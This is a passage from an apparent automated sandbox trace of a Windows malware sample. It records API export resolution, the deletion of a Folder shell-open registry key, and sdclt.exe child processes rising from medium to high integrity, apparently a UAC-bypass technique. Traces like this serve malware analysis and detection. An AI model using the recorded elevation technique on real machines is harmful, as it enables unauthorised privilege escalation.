(lpString1="BaseCleanupAppcompatCacheSupport", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseIsDosApplication", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.979] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepAppXExtension", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.980] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepReportFault", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="Beep", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BuildCommDCBA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="BuildCommDCBW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="CallNamedPipeA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="CallNamedPipeW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="CancelIo", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="CancelIoEx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.981] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckElevation", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckTokenCapability", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="ClearCommBreak", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="ClearCommError", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CloseHandle", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="ClosePackageInfo", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CloseState", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CloseThreadpool", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.982] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CmdBatNotification", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CommConfigDialogA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CommConfigDialogW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CompareCalendarDates", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CompareFileTime", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CompareStringA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CompareStringEx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="CompareStringW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.983] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyContext", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyFile2", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyFileA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyFileExA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyFileExW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyFileW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CopyLZFile", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateActCtxA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateActCtxW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateDirectoryA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateDirectoryW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateEnclave", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateEventA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.984] lstrcmpA (lpString1="CreateEventExA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateEventExW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateEventW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFiber", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFiberEx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFile2", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileMappingA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileMappingW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateFileW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateHardLinkA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateHardLinkW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateJobObjectA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateJobObjectW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateJobSet", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateMailslotA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateMailslotW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.985] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateMutexA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateMutexExA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateMutexExW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateMutexW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreatePipe", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateProcessA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateProcessAsUserW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateProcessInternalA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateProcessInternalW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateProcessW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateRemoteThread", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateRemoteThreadEx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateSemaphoreA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateSemaphoreExA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateSemaphoreExW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateSemaphoreW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateSocketHandle", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateSymbolicLinkA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateSymbolicLinkTransactedA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.986] lstrcmpA (lpString1="CreateSymbolicLinkTransactedW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateSymbolicLinkW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateTapePartition", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateThread", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateThreadpool", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateThreadpoolCleanupGroup", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateThreadpoolIo", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateThreadpoolTimer", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateThreadpoolWait", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateThreadpoolWork", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateTimerQueue", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateTimerQueueTimer", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateToolhelp32Snapshot", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateWaitableTimerA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateWaitableTimerExA", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateWaitableTimerExW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CreateWaitableTimerW", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="CtrlRoutine", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="DeactivateActCtx", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="DeactivateActCtxWorker", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.987] lstrcmpA (lpString1="DebugActiveProcess", lpString2="Wow64RevertWow64FsRedirection") returned -1 [0281.988] Wow64RevertWow64FsRedirection (OlValue=0xa0f8c0) returned 1 [0281.988] Sleep (dwMilliseconds=0x7d0) [0284.294] RegDeleteKeyA (hKey=0x80000001, lpSubKey="Software\\Classes\\Folder\\shell\\open\\command") returned 0x0 [0284.297] ExitProcess (uExitCode=0x0) Thread: id = 25 os_tid = 0xe08 Thread: id = 26 os_tid = 0xe0c Thread: id = 27 os_tid = 0xe10 Thread: id = 28 os_tid = 0xe14 Thread: id = 29 os_tid = 0xe18 Thread: id = 32 os_tid = 0xec4 Process: id = "8" image_name = "sdclt.exe" filename = "c:\\windows\\system32\\sdclt.exe" page_root = "0x199dc000" os_pid = "0xe24" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xdd8" cmd_line = "\"C:\\Windows\\system32\\sdclt.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1377 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1378 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1379 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1380 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1381 start_va = 0xe0000 end_va = 0xe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1382 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1383 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1384 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1385 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1386 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1387 start_va = 0x7ff7c9cb0000 end_va = 0x7ff7c9ddffff monitored = 0 entry_point = 0x7ff7c9d28660 region_type = mapped_file name = "sdclt.exe" filename = "\\Windows\\System32\\sdclt.exe" (normalized: "c:\\windows\\system32\\sdclt.exe") Region: id = 1388 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 30 os_tid = 0xe28 Process: id = "9" image_name = "sdclt.exe" filename = "c:\\windows\\system32\\sdclt.exe" page_root = "0x183ea000" os_pid = "0xebc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xdd8" cmd_line = "\"C:\\Windows\\system32\\sdclt.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1390 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1391 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1392 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1393 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1394 start_va = 0xe0000 end_va = 0xe2fff monitored = 1 